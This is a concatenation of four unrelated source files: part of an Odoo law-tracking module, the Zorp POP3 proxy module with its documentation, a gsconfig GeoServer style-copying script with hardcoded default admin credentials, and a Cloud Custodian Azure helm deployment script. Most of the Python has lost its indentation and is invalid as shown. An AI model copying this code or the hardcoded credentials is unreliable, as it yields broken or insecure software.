user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if 'lang' not in context:
if user.lang:
context = dict(context, lang=user.lang)
signature_mail = self.pool.get('email.template').generate_email(cr, uid, signature_template.id, user.company_id.id, context=context)
partner_match_ids = context.get('partner_match_ids', [])
for law_project in self.browse(cr, uid, ids, context):
try:
mail = self.pool.get('email.template').generate_email(cr, uid, template.id, law_project.id, context=context)
subtype = 'mail.mt_comment'
body_html = mail['body_html']
body_html = tools.append_content_to_html(mail['body_html'], signature_mail['body_html'], plaintext=False, container_tag='div')
self.message_post(cr, uid, [law_project.id], subject=mail['subject'],
body=body_html, type='comment', subtype=subtype, context=context, partner_ids = partner_match_ids)
except Exception:
raise
def get_selection_item(self, cr, uid, ids, obj=None, model=None, field=None, context=None):
        if context is None:
context = {}
ret = ''
if obj and field and model:
field_val = getattr(obj, field)
try:
ret = dict(self.pool.get(model).fields_get(cr, uid, allfields=[field], context=context)[field]['selection'])[field_val]
except Exception:
return ''
return ret
def get_treatment(self, cr, uid, ids, example_id=False, context=None):
if not context:
context = {}
order_paper_ids = context.get('order_paper_ids', False)
order_paper_obj = self.pool.get('law_tracking.order_paper')
treatment_detail_obj = self.pool.get('law_tracking.treatment_detail')
enclosure_treatment_detail_obj = self.pool.get('law_tracking.enclosure_treatment_detail')
ret = False
if not order_paper_ids and example_id:
order_paper_ids = example_id
if order_paper_ids:
order_paper = order_paper_obj.browse(cr, uid, order_paper_ids, context=context)[0]
if order_paper.type == 'commission':
treatment_detail_ids = treatment_detail_obj.search(cr, uid, [('order_paper_id','in', order_paper_ids),('law_project_id','in',ids)], context=context)
if treatment_detail_ids:
# There should be only one treatment for an order paper and a law_project
ret = treatment_detail_obj.browse(cr, uid, treatment_detail_ids, context=context)[0]
elif order_paper.type == 'enclosure':
                enclosure_treatment_detail_ids = enclosure_treatment_detail_obj.search(cr, uid, [('order_paper_id','in', order_paper_ids),('law_project_id','in',ids)], context=context)
                if enclosure_treatment_detail_ids:
                    # There should be only one treatment for an order paper and a law_project
                    ret = enclosure_treatment_detail_obj.browse(cr, uid, enclosure_treatment_detail_ids, context=context)[0]
return ret
def require_subscription(self, cr, uid, ids, context=None):
if not context:
context = {}
subscription_obj = self.pool.get('law_tracking.subscription')
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
partner_ids = self.get_subscriber(cr, SUPERUSER_ID, uid, context)
if not partner_ids:
            raise osv.except_osv(_('No partner of type "Is Company" related to the current user!'), _('The user must belong to a partner of type "Is Company".'))
ret = []
wf_service = netsvc.LocalService("workflow")
for law_project in self.browse(cr, uid, ids, context=context):
subscription_data = {
'price': 0,
'law_project_id': law_project.id,
'partner_id': partner_ids[0],
}
if not law_project.user_subscription_id:
# we create it with admin user so it can add subscriptors
# subscription_id = subscription_obj.create(cr, 1, subscription_data, context=context)
subscription_id = subscription_obj.create(cr, uid, subscription_data, context=context)
else:
subscription_id = law_project.user_subscription_id.id
wf_service.trg_validate(uid, 'law_tracking.subscription', subscription_id, 'sgn_require', cr)
ret.append(subscription_id)
return ret
def unsubscribe(self, cr, uid, ids, context=None):
if not context:
context = {}
subscription_obj = self.pool.get('law_tracking.subscription')
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
partner_ids = []
        if user.partner_id.is_company:
partner_ids.append(user.partner_id.id)
for x in user.partner_id.child_ids:
partner_ids.append(x.id)
elif user.partner_id.parent_id:
partner_ids.append(user.partner_id.parent_id.id)
for x in user.partner_id.parent_id.child_ids:
partner_ids.append(x.id)
wf_service = netsvc.LocalService("workflow")
self.message_unsubscribe(cr, SUPERUSER_ID, ids, partner_ids, context=context)
subscription_ids = self.pool.get('law_tracking.subscription').search(cr, uid, [('law_project_id','in',ids), ('partner_id', 'in', partner_ids), ('state','=','subscribed')])
for subscription in subscription_ids:
wf_service.trg_validate(SUPERUSER_ID, 'law_tracking.subscription', subscription, 'sgn_unsubscribe', cr)
return True
def format_date(self, cr, uid, ids, date, format, context):
# date = datetime.strptime(date, "%Y-%m-%d %H:%M:%S")
format_date = datetime.strftime(datetime.strptime(date, tools.DEFAULT_SERVER_DATE_FORMAT) , format)
# format_date = datetime.strftime(datetime.strptime(date, tools.DEFAULT_SERVER_DATE_FORMAT) , format)
return format_date
def write(self, cr, uid, ids, vals, context=None):
if 'stage_id' in vals:
self.write_log(cr, uid, ids, vals, context=context)
ret = super(law_project, self).write(cr, uid, ids, vals, context=context)
if 'stage_id' in vals:
self.write_comment(cr, uid, ids, 'law_tracking_x', 'project_status_change_mail', context=context)
return ret
def write_log(self, cr, uid, ids, vals, context=None):
for law_project in self.browse(cr, uid, ids, context=context):
new_stage = vals['stage_id']
date = context.get('log_date', fields.datetime.now())
new_vals = {
'user_id': uid,
'date': date,
'name': "%s --> %s" % (
law_project.stage_id.name or '',
self.pool.get('law_tracking.stage').browse(
cr, uid, new_stage, context=context).name or ''),
'law_project_id': law_project.id,
}
self.pool.get('law_tracking.log').create(cr, uid, new_vals, context=context)
return True
def get_actual_project_url(self, cr, uid, ids, context=None):
assert len(ids) == 1
action = 'portal_law_tracking.action_portal_law_project_unsubscribed_law_projects'
view_type='form'
res_id = self.browse(cr, uid, ids[0], context=context).id
ret = self.get_resource_url(cr, uid, ids, action=action, view_type=view_type, res_id=res_id)
return ret
def get_resource_url(self, cr, uid, ids, action='login', view_type=None, menu_id=None, res_id=None, model=None, context=None):
""" generate a signup url for the given partner ids and action, possibly overriding
the url state components (menu_id, id, view_type) """
if context is None:
context= {}
res = dict.fromkeys(ids, False)
base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
query = {'db': cr.dbname}
fragment = {'action': action,}
if view_type:
fragment['view_type'] = view_type
if menu_id:
fragment['menu_id'] = menu_id
if model:
fragment['model'] = model
if res_id:
fragment['id'] = res_id
res = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
return res
|
############################################################################
##
## Copyright (c) 2000-2015 BalaBit IT Ltd, Budapest, Hungary
## Copyright (c) 2015-2018 BalaSys IT Ltd, Budapest, Hungary
##
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program; if not, write to the Free Software Foundation, Inc.,
## 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##
############################################################################
"""<module maturity="stable">
<summary>
Proxy for the Post Office Protocol version 3.
</summary>
<description>
<para>
The Pop3 module defines the classes constituting the proxy for the POP3 protocol.
</para>
<section>
<title>The POP3 protocol</title>
<para>
Post Office Protocol version 3 (POP3) is usually used by mail
user agents (MUAs) to download messages from a remote mailbox. POP3
supports only a single mailbox; it does not support the advanced multi-mailbox operations
offered by alternatives such as IMAP.
</para>
<para>
The POP3 protocol uses a single TCP connection to give access to a
single mailbox. It uses a simple command/response based approach, the
client issues a command and a server can respond either positively
or negatively.
</para>
<section>
<title>Protocol elements</title>
<para>
The basic protocol is the following: the client issues a request (also called
command in POP3 terminology) and the server responds with the
result. Both commands and responses are line based: each command is
sent as a complete line, and a response is either a single line or - in the case of
mail transfer commands - multiple lines.
</para>
<para>
Commands begin with a case-insensitive keyword possibly followed
by one or more arguments (such as RETR or DELE).
</para>
<para>
Responses begin with a status indicator ("+OK" or "-ERR") and a
possible explanation of the status code (e.g.: "-ERR
Permission denied.").
</para>
<para>
Responses to certain commands (usually mail transfer commands) also
contain a data attachment, such as the mail body. See the <xref linkend="pop3_bulktransfer"/> for further details.
</para>
</section>
<section>
<title>POP3 states</title>
<para>
The protocol begins with the server displaying a greeting message,
usually containing information about the server.
</para>
<para>
After the greeting message the client takes control and the protocol
enters the AUTHORIZATION state where the user has to pass credentials
proving his/her identity.
</para>
<para>
After successful authentication the protocol enters
TRANSACTION state where mail access commands can be issued.
</para>
<para>
When the client has finished processing, it issues a QUIT command
and the connection is closed.
</para>
</section>
<section xml:id="pop3_bulktransfer">
<title>Bulk transfers</title>
<para>
Responses to certain commands (such as LIST or RETR) contain a long
data stream. This is transferred as a series of lines, terminated by
a "CRLF '.' CRLF" sequence, just like in SMTP.
</para>
<example>
<title>POP3 protocol sample</title>
<synopsis>+OK POP3 server ready
USER account
+OK User name is ok
PASS password
+OK Authentication successful
LIST
+OK Listing follows
1 5758
2 232323
3 3434
.
RETR 1
+OK Mail body follows
From: [email protected]
To: [email protected]
Subject: sample mail
This is a sample mail message. Lines beginning with
..are escaped, another '.' character is prepended which
is removed when the mail is stored by the client.
.
DELE 1
+OK Mail deleted
QUIT
+OK Good bye</synopsis>
</example>
</section>
</section>
<section>
<title>Proxy behavior</title>
<para>
Pop3Proxy is a module built for parsing messages of the POP3 protocol. It reads and parses COMMANDs on the client side, and sends them to the server if the local security policy permits. Arriving RESPONSEs are parsed as well, and sent to the client if the local security policy permits. It is possible to manipulate both the requests and the responses.
</para>
<section>
<title>Default policy for commands</title>
<para>
By default, the proxy accepts all commands recommended in RFC 1939, as well as the
optional USER, PASS, and AUTH commands. The proxy understands every command specified in RFC 1939 and the AUTH command; any other command has to be enabled manually.
</para>
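<para>
The following sketch (the class name CapaPop3 is only an illustration) shows how a command
that the default configuration rejects can be enabled through the <parameter>request</parameter> hash.
</para>
<example>
<title>Example for enabling an additional command in POP3</title>
<synopsis>class CapaPop3(Pop3Proxy):
    def config(self):
        Pop3Proxy.config(self)
        self.request["CAPA"] = (POP3_REQ_ACCEPT)</synopsis>
</example>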
</section>
<section xml:id="pop3_policies">
<title>Configuring policies for POP3 commands</title>
<para>
Changing the default behavior of commands can be done using the
hash named <parameter>request</parameter>. The hash is indexed by the command name
(e.g.: USER or AUTH). See <xref linkend="proxy_policies"/> for details.
</para>
<inline type="actiontuple" target="action.pop3.req"/>
<example>
<title>Example for allowing only APOP authentication in POP3</title>
<para>
This sample proxy class rejects the USER authentication requests, but allows APOP requests.
</para>
<synopsis>class APop3(Pop3Proxy):
def config(self):
Pop3Proxy.config(self)
self.request["USER"] = (POP3_REQ_REJECT)
self.request["APOP"] = (POP3_REQ_ACCEPT)</synopsis>
</example>
<example>
<title>Example for converting simple USER/PASS authentication to APOP in POP3</title>
<para>
The above example simply rejected USER/PASS authentication, this one converts USER/PASS authentication to APOP authentication messages.
</para>
<synopsis>class UToAPop3(Pop3Proxy):
def config(self):
Pop3Proxy.config(self)
self.request["USER"] = (POP3_REQ_POLICY,self.DropUSER)
self.request["PASS"] = (POP3_REQ_POLICY,self.UToA)
def DropUSER(self,command):
self.response_value = "+OK"
self.response_param = "User ok Send Password"
return POP3_REQ_REJECT
    def UToA(self, command):
        # The username is stored in self.username,
        # the password in self.request_param,
        # and the server timestamp in self.timestamp,
        # so the digest can be calculated.
        # NOTE: This is only an example, calcdigest must be
        # implemented separately
        digest = calcdigest(self.timestamp + self.request_param)
        self.request_command = "APOP"
        self.request_param = self.username + " " + digest
        return POP3_REQ_ACCEPT</synopsis>
</example>
</section>
<section>
<title>Rewriting the banner</title>
<para>
As in many other protocols, POP3 also starts with a server banner.
This banner contains the protocol version the server uses, the
possible protocol extensions that it supports and, in many situations,
the vendor and exact version number of the POP3 server.
</para>
<para>
This information is useful only if the clients connecting to the POP3
server can be trusted, as it might make bug hunting somewhat easier.
On the other hand, this information is also useful for attackers when
targeting this service.
</para>
<para>
To prevent this, the banner can be replaced with a neutral one.
Use the <parameter>request</parameter> hash with the 'GREETING' keyword as shown in the following example.
</para>
<example>
<title>Rewriting the banner in POP3</title>
<synopsis>class NeutralPop3(Pop3Proxy):
def config(self):
Pop3Proxy.config(self)
self.request["GREETING"] = (POP3_REQ_POLICY, None, self.rewriteBanner)
    def rewriteBanner(self, response):
self.response_param = "Pop3 server ready"
return POP3_RSP_ACCEPT</synopsis>
</example>
<note>
<para>
Some protocol extensions (most notably APOP) use
random characters in the greeting message as salt in the authentication
process, so changing the banner when APOP is used effectively prevents
APOP from working properly.
</para>
</note>
</section>
<section xml:id="pop3_stacking">
<title>Stacking</title>
<para>
The available stacking modes for this proxy module are listed in the following table. For additional information on stacking, see <xref linkend="proxy_stacking"/>.
</para>
<inline type="actiontuple" target="action.pop3.stk"/>
</section>
<section xml:id="pop3_rejectbymail">
<title>Rejecting viruses and spam</title>
<para>
When filtering messages for viruses or spam, the content vectoring modules reject infected and spam e-mails.
In such cases the POP3 proxy notifies the client about the rejected message in a special e-mail.</para>
<para>To reject e-mail messages using the <parameter>ERR</parameter> protocol element, set the <parameter>reject_by_mail</parameter>
attribute to <parameter>FALSE</parameter>. However, this is not recommended, because several client applications handle
<parameter>ERR</parameter> responses incorrectly.
</para>
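<para>
A minimal sketch of the setting described above (the class name is only an illustration):
</para>
<example>
<title>Example for rejecting messages with an ERR response in POP3</title>
<synopsis>class ErrRejectPop3(Pop3Proxy):
    def config(self):
        Pop3Proxy.config(self)
        self.reject_by_mail = FALSE</synopsis>
</example>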
<note>
<para>
Infected e-mails are put into the quarantine and deleted from the server.
</para>
</note>
</section>
</section>
<section>
<title>Related standards</title>
<itemizedlist>
<listitem>
<para>
Post Office Protocol Version 3 is described in RFC 1939.
</para>
</listitem>
<listitem>
<para>
The POP3 AUTHentication command is described in RFC 1734.
</para>
</listitem>
</itemizedlist>
</section>
</description>
<metainfo>
<enums>
<enum maturity="stable" id="enum.pop3.req">
<description>
These are the values used in the request hash.
</description>
<item>
<name>POP3_REQ_ACCEPT</name>
</item>
<item>
<name>POP3_REQ_ACCEPT_MLINE</name>
</item>
<item>
<name>POP3_REQ_REJECT</name>
</item>
<item>
<name>POP3_REQ_ABORT</name>
</item>
<item>
<name>POP3_REQ_POLICY</name>
</item>
</enum>
<enum maturity="stable" id="enum.pop3.rsp">
<description>
These are the pop3 response hashes.
</description>
<item>
<name>POP3_RSP_ACCEPT</name>
</item>
<item>
<name>POP3_RSP_REJECT</name>
</item>
<item>
<name>POP3_RSP_ABORT</name>
</item>
</enum>
<enum maturity="stable" id="enum.pop3.stk">
<description>
These are the pop3 proxy stacking capabilities.
</description>
<item>
<name>POP3_STK_NONE</name>
</item>
<item>
<name>POP3_STK_DATA</name>
</item>
<item>
<name>POP3_STK_MIME</name>
</item>
<item>
<name>POP3_STK_POLICY</name>
</item>
</enum>
</enums>
<actiontuples>
<actiontuple maturity="stable" id="action.pop3.req" action_enum="enum.pop3.req">
<description>
Action codes for POP3 requests
</description>
<tuple action="POP3_REQ_ACCEPT">
<args/>
<description>
<para>
Accept the request without any modification.
</para>
</description>
</tuple>
<tuple action="POP3_REQ_ACCEPT_MLINE">
<args/>
<description>
<para>
Accept multiline requests without modification. Use it only if unknown commands have to be enabled (i.e. commands not specified in RFC 1939 or RFC 1734).
</para>
</description>
</tuple>
<tuple action="POP3_REQ_REJECT">
<args>
<string/>
</args>
<description>
<para>
Reject the request. The second parameter contains a string that is sent back to the client.
</para>
</description>
</tuple>
<tuple action="POP3_REQ_POLICY">
<args>METHOD,METHOD</args>
<description>
<para>
Call the function specified to make a decision about the event. See <xref linkend="proxy_policies"/> for details.
This action uses two additional
tuple items, which must be callable Python functions. The first function receives
two parameters: self and command.
</para>
<para>
The second one is called with the answer (if the answer is multiline, it is called for every line) and receives two parameters: self and response_param.
</para>
</description>
</tuple>
<tuple action="POP3_REQ_ABORT">
<args/>
<description>
<para>
Reject the request and terminate the connection.
</para>
</description>
</tuple>
</actiontuple>
<actiontuple maturity="stable" id="action.pop3.rsp" action_enum="enum.pop3.rsp">
<description>
Action codes for POP3 responses
</description>
<tuple action="POP3_RSP_ACCEPT">
<args></args>
<description>
<para>Accept the response without any modification.
</para>
</description>
</tuple>
<tuple action="POP3_RSP_REJECT">
<args></args>
<description>
<para>Reject the response.
</para>
</description>
</tuple>
<tuple action="POP3_RSP_ABORT">
<args></args>
<description>
<para>Reject the response and terminate the connection.</para>
</description>
</tuple>
</actiontuple>
<actiontuple maturity="stable" id="action.pop3.stk" action_enum="enum.pop3.stk">
<description>
Action codes for proxy stacking
</description>
<tuple action="POP3_STK_POLICY">
<args></args>
<description>
<para>
Call the function specified to decide which part (if any) of the traffic should be passed to the stacked proxy.
</para>
</description>
</tuple>
<tuple action="POP3_STK_NONE">
<args></args>
<description>
<para>
No additional proxy is stacked into the POP3 proxy.
</para>
</description>
</tuple>
<tuple action="POP3_STK_MIME">
<args>
<link id="action.zorp.stack"/>
</args>
<description>
<para>The data part of the traffic including the MIME headers is passed to the specified stacked proxy.
</para>
</description>
</tuple>
<tuple action="POP3_STK_DATA">
<args>
<link id="action.zorp.stack"/>
</args>
<description>
<para>Only the data part of the traffic is passed to the specified stacked proxy.
</para>
</description>
</tuple>
</actiontuple>
</actiontuples>
</metainfo>
</module>
"""
from Zorp import *
from Proxy import Proxy
POP3_REQ_ACCEPT = 1
POP3_REQ_ACCEPT_MLINE = 100
POP3_REQ_REJECT = 3
POP3_REQ_ABORT = 4
POP3_REQ_POLICY = 6
POP3_RSP_ACCEPT = 1
POP3_RSP_REJECT = 3
POP3_RSP_ABORT = 4
POP3_STK_NONE = 1
POP3_STK_DATA = 2
POP3_STK_MIME = 3
POP3_STK_POLICY = 6
class AbstractPop3Proxy(Proxy):
"""<class maturity="stable" abstract="yes">
<summary>
Class encapsulating the abstract POP3 proxy.
</summary>
<description>
<para>
This class implements an abstract POP3 proxy - it serves as a starting point for customized proxy classes, but is itself not directly usable. Service definitions should refer to a customized class derived from AbstractPop3Proxy, or a predefined Pop3Proxy proxy class. AbstractPop3Proxy denies all requests by default.
</para>
</description>
<metainfo>
<attributes>
<attribute maturity="stable">
<name>timeout</name>
<type>
<integer/>
</type>
<default>600000</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Timeout in milliseconds. If no packet arrives within this interval,
connection is dropped.
</description>
</attribute>
<attribute maturity="stable">
<name>username</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
</runtime>
<description>
Username as specified by the client.
</description>
</attribute>
<attribute maturity="stable">
<name>password</name>
<type>
<string/>
</type>
<default></default>
<conftime/>
<runtime>
<read/>
</runtime>
<description>
Password sent to the server (if any).
</description>
</attribute>
<attribute maturity="stable">
<name>max_request_line_length</name>
<type>
<integer/>
</type>
<default>90</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum allowed line length for client requests.
</description>
</attribute>
<attribute maturity="stable">
<name>max_response_line_length</name>
<type>
<integer/>
</type>
<default>512</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum allowed line length for server responses.
</description>
</attribute>
<attribute maturity="stable">
<name>max_username_length</name>
<type>
<integer/>
</type>
<default>8</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum allowed length of usernames.
</description>
</attribute>
<attribute maturity="stable">
<name>max_password_length</name>
<type>
<integer/>
</type>
<default>16</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum allowed length of passwords.
</description>
</attribute>
<attribute maturity="stable">
<name>response_value</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
When a command or response is passed to the policy level, its value can be changed to this value. (It has effect only if the return value is not POP3_*_ACCEPT).
</description>
</attribute>
<attribute maturity="stable">
<name>response_param</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
When a command or response is passed to the policy level, the value of its parameters can be changed to this value. (It has effect only if the return value is not POP3_*_ACCEPT).
</description>
</attribute>
<attribute maturity="stable">
<name>response_multiline</name>
<type>
<boolean/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
Enable multiline responses.
</description>
</attribute>
<attribute maturity="stable">
<name>request_command</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
When a command is passed to the policy level, its value can be changed to this value.
</description>
</attribute>
<attribute maturity="stable">
<name>request_param</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
<write/>
</runtime>
<description>
When a command is passed to the policy level, the value of its parameters can be changed to this value.
</description>
</attribute>
<attribute maturity="stable">
<name>request</name>
<type>
<hash>
<key>
<string/>
</key>
<value>
<link id="enum.pop3.req"/>
</value>
</hash>
</type>
<default/>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
<write/>
</runtime>
<description>
Normative policy hash for POP3 requests
indexed by the command name (e.g.: "USER", "UIDL", etc.). See also <xref linkend="pop3_policies"/>.
</description>
</attribute>
<attribute maturity="stable">
<name>response_stack</name>
<type>
<hash>
<key>
<string/>
</key>
<value>
<link id="action.pop3.stk"/>
</value>
</hash>
</type>
<default/>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
<write/>
</runtime>
<description>
Hash containing the stacking policy for multiline POP3 responses. The hash
is indexed by the POP3 response. See also <xref
linkend="pop3_stacking"/>.
</description>
</attribute>
<attribute maturity="stable">
<name>session_timestamp</name>
<type>
<string/>
</type>
<default>n/a</default>
<conftime/>
<runtime>
<read/>
</runtime>
<description>
If the POP3 server implements the APOP command, with the greeting message it sends a timestamp, which is stored in this parameter.
</description>
</attribute>
<attribute maturity="stable">
<name>permit_unknown_command</name>
<type>
<boolean/>
</type>
<default>FALSE</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Enable unknown commands.
</description>
</attribute>
<attribute maturity="stable">
<name>permit_longline</name>
<type>
<boolean/>
</type>
<default>FALSE</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
In multiline answers (especially in downloaded messages) very long lines can sometimes appear. Enabling this option allows lines of unlimited length in multiline answers.
</description>
</attribute>
<attribute maturity="stable">
<name>max_authline_count</name>
<type>
<integer/>
</type>
<default>4</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
Maximum number of lines that can be sent during the authentication
conversation. The default value is enough for password authentication, but might have to be increased for other types of authentication.
</description>
</attribute>
<attribute maturity="stable">
<name>reject_by_mail</name>
<type>
<boolean/>
</type>
<default>TRUE</default>
<conftime>
<read/>
<write/>
</conftime>
<runtime>
<read/>
</runtime>
<description>
If the stacked proxy or content vectoring module rejects an e-mail message, reply with a special e-mail message instead
of an <parameter>ERR</parameter> response. See <xref linkend="pop3_rejectbymail"/> for details.
</description>
</attribute>
</attributes>
</metainfo>
</class>
"""
name = "pop3"
def __init__(self, session):
"""<method maturity="stable" internal="yes">
<summary>
Initialize a Pop3Proxy instance.
</summary>
<description>
<para>
Create and set up a Pop3Proxy instance.
</para>
</description>
<metainfo>
<arguments>
<argument>
<name>session</name>
<type>SESSION</type>
<description>
session this instance belongs to
</description>
</argument>
</arguments>
</metainfo>
</method>
"""
Proxy.__init__(self, session)
class Pop3Proxy(AbstractPop3Proxy):
"""<class maturity="stable">
<summary>
Default POP3 proxy based on AbstractPop3Proxy.
</summary>
<description>
<para>
Pop3Proxy is the default POP3 proxy based on AbstractPop3Proxy, allowing the most commonly used requests.
</para>
<para>The following requests are permitted: APOP; DELE; LIST; LAST; NOOP; PASS; QUIT; RETR; RSET; STAT; TOP; UIDL; USER; GREETING.
All other requests (including CAPA) are rejected.
</para>
</description>
<metainfo>
<attributes/>
</metainfo>
</class>
"""
def config(self):
"""<method internal="yes">
<summary>
Default config event handler.
</summary>
<description>
<para>
Enables the most common POP3 methods so we have a
useful default configuration.
</para>
</description>
<metainfo>
<arguments/>
</metainfo>
</method>
"""
self.request["APOP"] = POP3_REQ_ACCEPT
self.request["DELE"] = POP3_REQ_ACCEPT
self.request["LIST"] = POP3_REQ_ACCEPT
self.request["LAST"] = POP3_REQ_ACCEPT
self.request["NOOP"] = POP3_REQ_ACCEPT
self.request["PASS"] = POP3_REQ_ACCEPT
self.request["QUIT"] = POP3_REQ_ACCEPT
self.request["RETR"] = POP3_REQ_ACCEPT
self.request["RSET"] = POP3_REQ_ACCEPT
self.request["STAT"] = POP3_REQ_ACCEPT
self.request["TOP"] = POP3_REQ_ACCEPT
self.request["UIDL"] = POP3_REQ_ACCEPT
self.request["USER"] = POP3_REQ_ACCEPT
self.request["CAPA"] = POP3_REQ_REJECT
self.request["*"] = POP3_REQ_REJECT
self.request["GREETING"] = POP3_REQ_ACCEPT
|
'''
gsconfig is a python library for manipulating a GeoServer instance via the GeoServer RESTConfig API.
The project is distributed under a MIT License .
'''
__author__ = "David Winslow"
__copyright__ = "Copyright 2012-2015 Boundless, Copyright 2010-2012 OpenPlans"
__license__ = "MIT"
from geoserver.catalog import Catalog
demo = Catalog("http://localhost:8080/geoserver/rest",
"admin", "geoserver")
live = Catalog("http://localhost:8080/geoserver2/rest",
"admin", "geoserver")
groupname = "Wayne"
prefix = "wayne_"
def resolve(layer, style):
if style is not None:
return (layer, style)
else:
return (layer, demo.get_layer(layer).default_style.name)
g = demo.get_layergroup("groupname")
resolved = [resolve(l, s) for (l, s) in zip(g.layers, g.styles)]
# upload all styles to live
for (l, s) in resolved:
wayne_style = prefix + s
style_on_server = live.get_style(wayne_style)
sld = demo.get_style(s).sld_body
if style_on_server is None:
live.create_style(wayne_style, sld)
else:
style_on_server.update_body(sld)
backup_layernames = {}
# check that all requisite layers exist!
for (l, s) in resolved:
assert live.get_layer(l) is not None or l in backup_layernames, l
lyrs = [backup_layernames.get(x[0], x[0]) for x in resolved]
stls = [(prefix + x[1]) for x in resolved]
wayne_group = live.get_layergroup(groupname)
if wayne_group is None:
wayne_group = live.create_layergroup(groupname)
wayne_group.layers = lyrs
wayne_group.styles = stls
live.save(wayne_group)
|
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import abc
import logging
import os
import re
import tempfile
import click
import yaml
from c7n.resources import load_resources
from c7n.utils import local_session
from c7n_azure.constants import ENV_CONTAINER_QUEUE_NAME, ENV_SUB_ID
from c7n_azure.session import Session
logging.basicConfig(level=logging.INFO, format='%(message)s')
logger = logging.getLogger("c7n_azure.container-host.deploy")
MANAGEMENT_GROUP_TYPE = '/providers/Microsoft.Management/managementGroups'
SUBSCRIPTION_TYPE = '/subscriptions'
class Deployment:
def __init__(self, ctx):
self.dry_run = ctx.parent.params.get('dry_run')
self.deployment_name = ctx.parent.params.get('deployment_name')
self.deployment_namespace = ctx.parent.params.get('deployment_namespace')
self.helm_values_file = ctx.parent.params.get('helm_values_file')
self.helm_set_values = ctx.parent.params.get('helm_set', [])
self.subscription_hosts = []
load_resources()
self.session = local_session(Session)
@abc.abstractmethod
def prepare_subscription_hosts(self):
raise NotImplementedError()
def run(self):
self.prepare_subscription_hosts()
with open(self.helm_values_file, 'r') as values_file:
            values = yaml.safe_load(values_file)
sub_hosts = values.setdefault('subscriptionHosts', [])
sub_hosts += self.subscription_hosts
values_file_path = Deployment.write_values_to_file(values)
logger.info("Created values file at {}\n".format(values_file_path))
values_yaml = yaml.dump(values)
logger.info(values_yaml)
        # Currently the helm chart is deployed through a system command; this assumes helm is
        # installed and configured with the target cluster.
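        # With the defaults above the generated command looks roughly like this
        # (the values file path is illustrative):
        #   helm upgrade --install --debug --namespace cloud-custodian \
        #       --values /tmp/tmpXXXXXX.yaml cloud-custodian <chart directory>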
logger.info("Deploying with helm")
helm_command = self.build_helm_command(values_file_path)
logger.info(helm_command)
exit_status = os.system(helm_command)
os.remove(values_file_path)
if exit_status:
exit(exit_status)
    def add_subscription_host(self, name, environment=None, secret_environment=None):
        # Avoid mutable default arguments; fall back to empty dicts here instead.
        self.subscription_hosts.append({
            'name': name,
            'environment': environment or {},
            'secretEnvironment': secret_environment or {},
        })
def build_helm_command(self, values_file_path):
command = 'helm upgrade --install --debug'
if self.dry_run:
command += ' --dry-run'
if self.deployment_namespace:
command += ' --namespace {}'.format(self.deployment_namespace)
command += '\\\n\t --values {}'.format(values_file_path)
for helm_set_value in self.helm_set_values:
command += '\\\n\t --set {}'.format(helm_set_value)
chart_path = os.path.dirname(__file__) or os.getcwd()
command += '\\\n\t {} {}'.format(self.deployment_name, chart_path)
return command
@staticmethod
def sub_name_to_deployment_name(sub_name):
# Deployment names must use only lower case alpha numeric characters, -, _, and .
# They must also start/end with an alpha numeric character
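        # e.g. a hypothetical subscription named "My Subscription (Prod)" becomes "my-subscription-prod"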
return re.sub(r'[^A-Za-z0-9-\._]+', '-', sub_name).strip('-_.').lower()
@staticmethod
def write_values_to_file(values):
        # mkstemp avoids the race condition inherent in tempfile.mktemp()
        fd, values_file_path = tempfile.mkstemp(suffix='.yaml')
        with os.fdopen(fd, 'w') as values_file:
            yaml.dump(values, stream=values_file)
return values_file_path
class SubscriptionDeployment(Deployment):
def __init__(self, ctx, subscription_id=None):
super(SubscriptionDeployment, self).__init__(ctx)
self.subscription_id = subscription_id
self.run()
def prepare_subscription_hosts(self):
client = self.session.client('azure.mgmt.subscription.SubscriptionClient')
subscription = client.subscriptions.get(self.subscription_id)
self.add_subscription_host(
Deployment.sub_name_to_deployment_name(subscription.display_name),
{
ENV_SUB_ID: self.subscription_id,
ENV_CONTAINER_QUEUE_NAME: 'c7n-{}'.format(self.subscription_id[-4:])
}
)
class ManagementGroupDeployment(Deployment):
def __init__(self, ctx, management_group_id=None):
super(ManagementGroupDeployment, self).__init__(ctx)
self.management_group_id = management_group_id
self.run()
def prepare_subscription_hosts(self):
self._add_subscription_hosts()
def _add_subscription_hosts(self):
client = self.session.client('azure.mgmt.managementgroups.ManagementGroupsAPI')
